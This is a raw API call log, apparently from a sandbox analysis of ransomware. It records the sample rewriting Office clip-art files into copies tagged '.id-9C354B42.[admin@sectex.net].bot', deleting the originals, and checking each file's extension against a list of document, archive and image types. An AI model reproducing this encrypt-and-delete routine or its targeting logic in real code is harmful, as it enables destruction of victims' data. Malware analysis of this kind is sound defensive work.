	[0163.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.146] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.146] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.147] GetLastError () returned 0x0
	[0163.147] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x12b4, lpOverlapped=0x0) returned 1
	[0163.148] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x12c0, lpOverlapped=0x0) returned 1
	[0163.149] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.149] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.149] SetEndOfFile (hFile=0x37c) returned 1
	[0163.149] CloseHandle (hObject=0x37c) returned 1
	[0163.149] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.149] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.151] CloseHandle (hObject=0x1b4) returned 1
	[0163.152] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.454] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf")) returned 1
	[0163.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63
	[0163.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63
	[0163.455] lstrlenW (lpString=".doc") returned 4
	[0163.455] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.455] lstrlenW (lpString=".docx") returned 5
	[0163.455] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0163.455] lstrlenW (lpString=".pdf") returned 4
	[0163.455] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.455] lstrlenW (lpString=".xls") returned 4
	[0163.455] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.455] lstrlenW (lpString=".xlsx") returned 5
	[0163.455] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0163.455] lstrlenW (lpString=".ppt") returned 4
	[0163.455] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63
	[0163.455] lstrlenW (lpString=".zip") returned 4
	[0163.455] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.455] lstrlenW (lpString=".rar") returned 4
	[0163.455] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.455] lstrlenW (lpString=".bz2") returned 4
	[0163.455] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.455] lstrlenW (lpString=".7z") returned 3
	[0163.455] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63
	[0163.455] lstrlenW (lpString=".dbf") returned 4
	[0163.455] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63
	[0163.455] lstrlenW (lpString=".1cd") returned 4
	[0163.455] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63
	[0163.455] lstrlenW (lpString=".jpg") returned 4
	[0163.455] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63
	[0163.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63
	[0163.456] lstrlenW (lpString=".doc") returned 4
	[0163.456] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.456] lstrlenW (lpString=".docx") returned 5
	[0163.456] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0163.456] lstrlenW (lpString=".pdf") returned 4
	[0163.456] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.456] lstrlenW (lpString=".xls") returned 4
	[0163.456] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.456] lstrlenW (lpString=".xlsx") returned 5
	[0163.456] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0163.456] lstrlenW (lpString=".ppt") returned 4
	[0163.456] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63
	[0163.456] lstrlenW (lpString=".zip") returned 4
	[0163.456] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.456] lstrlenW (lpString=".rar") returned 4
	[0163.456] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.456] lstrlenW (lpString=".bz2") returned 4
	[0163.456] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.456] lstrlenW (lpString=".7z") returned 3
	[0163.456] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63
	[0163.456] lstrlenW (lpString=".dbf") returned 4
	[0163.456] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63
	[0163.456] lstrlenW (lpString=".1cd") returned 4
	[0163.456] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 63
	[0163.456] lstrlenW (lpString=".jpg") returned 4
	[0163.456] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.457] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.457] lstrlenW (lpString="J0148309.JPG") returned 12
	[0163.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148309.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.457] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=43674) returned 1
	[0163.457] CloseHandle (hObject=0x3e8) returned 1
	[0163.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148309.jpg")) returned 0x20
	[0163.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148309.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148309.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.458] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.458] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148309.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.459] GetLastError () returned 0x0
	[0163.459] ReadFile (in: hFile=0x3e8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xaa9a, lpOverlapped=0x0) returned 1
	[0163.461] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xaaa0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xaaa0, lpOverlapped=0x0) returned 1
	[0163.463] ReadFile (in: hFile=0x3e8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.463] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.463] SetEndOfFile (hFile=0x37c) returned 1
	[0163.463] CloseHandle (hObject=0x37c) returned 1
	[0163.463] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.463] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.466] CloseHandle (hObject=0x3e8) returned 1
	[0163.466] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.466] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148309.jpg")) returned 1
	[0163.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 63
	[0163.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 63
	[0163.467] lstrlenW (lpString=".doc") returned 4
	[0163.467] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.467] lstrlenW (lpString=".docx") returned 5
	[0163.467] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0163.467] lstrlenW (lpString=".pdf") returned 4
	[0163.467] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.467] lstrlenW (lpString=".xls") returned 4
	[0163.467] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.467] lstrlenW (lpString=".xlsx") returned 5
	[0163.467] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0163.467] lstrlenW (lpString=".ppt") returned 4
	[0163.467] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 63
	[0163.467] lstrlenW (lpString=".zip") returned 4
	[0163.467] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.468] lstrlenW (lpString=".rar") returned 4
	[0163.468] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.468] lstrlenW (lpString=".bz2") returned 4
	[0163.468] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.468] lstrlenW (lpString=".7z") returned 3
	[0163.468] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 63
	[0163.468] lstrlenW (lpString=".dbf") returned 4
	[0163.468] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 63
	[0163.468] lstrlenW (lpString=".1cd") returned 4
	[0163.468] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 63
	[0163.468] lstrlenW (lpString=".jpg") returned 4
	[0163.468] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 63
	[0163.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 63
	[0163.468] lstrlenW (lpString=".doc") returned 4
	[0163.468] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.468] lstrlenW (lpString=".docx") returned 5
	[0163.468] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0163.468] lstrlenW (lpString=".pdf") returned 4
	[0163.468] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.468] lstrlenW (lpString=".xls") returned 4
	[0163.468] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.468] lstrlenW (lpString=".xlsx") returned 5
	[0163.468] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0163.468] lstrlenW (lpString=".ppt") returned 4
	[0163.468] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 63
	[0163.468] lstrlenW (lpString=".zip") returned 4
	[0163.468] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.468] lstrlenW (lpString=".rar") returned 4
	[0163.469] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.469] lstrlenW (lpString=".bz2") returned 4
	[0163.469] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.469] lstrlenW (lpString=".7z") returned 3
	[0163.469] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 63
	[0163.469] lstrlenW (lpString=".dbf") returned 4
	[0163.469] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 63
	[0163.469] lstrlenW (lpString=".1cd") returned 4
	[0163.469] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148309.JPG") returned 63
	[0163.469] lstrlenW (lpString=".jpg") returned 4
	[0163.469] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.469] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.469] lstrlenW (lpString="J0148757.JPG") returned 12
	[0163.469] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148757.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.470] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=67540) returned 1
	[0163.470] CloseHandle (hObject=0x3e8) returned 1
	[0163.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148757.jpg")) returned 0x20
	[0163.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148757.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148757.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.470] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.470] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148757.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.471] GetLastError () returned 0x0
	[0163.471] ReadFile (in: hFile=0x3e8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x107d4, lpOverlapped=0x0) returned 1
	[0163.474] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x107e0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x107e0, lpOverlapped=0x0) returned 1
	[0163.475] ReadFile (in: hFile=0x3e8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.476] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.476] SetEndOfFile (hFile=0x37c) returned 1
	[0163.476] CloseHandle (hObject=0x37c) returned 1
	[0163.476] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.476] SetEndOfFile (hFile=0x3e8) returned 1
	[0163.480] CloseHandle (hObject=0x3e8) returned 1
	[0163.481] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.481] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148757.jpg")) returned 1
	[0163.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 63
	[0163.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 63
	[0163.481] lstrlenW (lpString=".doc") returned 4
	[0163.482] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.482] lstrlenW (lpString=".docx") returned 5
	[0163.482] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0163.482] lstrlenW (lpString=".pdf") returned 4
	[0163.482] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.482] lstrlenW (lpString=".xls") returned 4
	[0163.482] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.482] lstrlenW (lpString=".xlsx") returned 5
	[0163.482] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0163.482] lstrlenW (lpString=".ppt") returned 4
	[0163.482] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 63
	[0163.482] lstrlenW (lpString=".zip") returned 4
	[0163.482] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.482] lstrlenW (lpString=".rar") returned 4
	[0163.482] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.482] lstrlenW (lpString=".bz2") returned 4
	[0163.482] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.482] lstrlenW (lpString=".7z") returned 3
	[0163.482] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 63
	[0163.482] lstrlenW (lpString=".dbf") returned 4
	[0163.482] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 63
	[0163.482] lstrlenW (lpString=".1cd") returned 4
	[0163.482] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 63
	[0163.482] lstrlenW (lpString=".jpg") returned 4
	[0163.482] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 63
	[0163.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 63
	[0163.482] lstrlenW (lpString=".doc") returned 4
	[0163.482] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.482] lstrlenW (lpString=".docx") returned 5
	[0163.482] lstrcmpiW (lpString1=".docx", lpString2="7.JPG") returned -1
	[0163.483] lstrlenW (lpString=".pdf") returned 4
	[0163.483] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.483] lstrlenW (lpString=".xls") returned 4
	[0163.483] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.483] lstrlenW (lpString=".xlsx") returned 5
	[0163.483] lstrcmpiW (lpString1=".xlsx", lpString2="7.JPG") returned -1
	[0163.483] lstrlenW (lpString=".ppt") returned 4
	[0163.483] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 63
	[0163.483] lstrlenW (lpString=".zip") returned 4
	[0163.483] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.483] lstrlenW (lpString=".rar") returned 4
	[0163.483] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.483] lstrlenW (lpString=".bz2") returned 4
	[0163.483] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.483] lstrlenW (lpString=".7z") returned 3
	[0163.483] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 63
	[0163.483] lstrlenW (lpString=".dbf") returned 4
	[0163.483] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 63
	[0163.483] lstrlenW (lpString=".1cd") returned 4
	[0163.483] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148757.JPG") returned 63
	[0163.483] lstrlenW (lpString=".jpg") returned 4
	[0163.483] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.483] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.483] lstrlenW (lpString="J0148798.JPG") returned 12
	[0163.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148798.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.484] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=38237) returned 1
	[0163.484] CloseHandle (hObject=0x3e8) returned 1
	[0163.484] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148798.jpg")) returned 0x20
	[0163.484] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148798.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0148798.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0148798.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
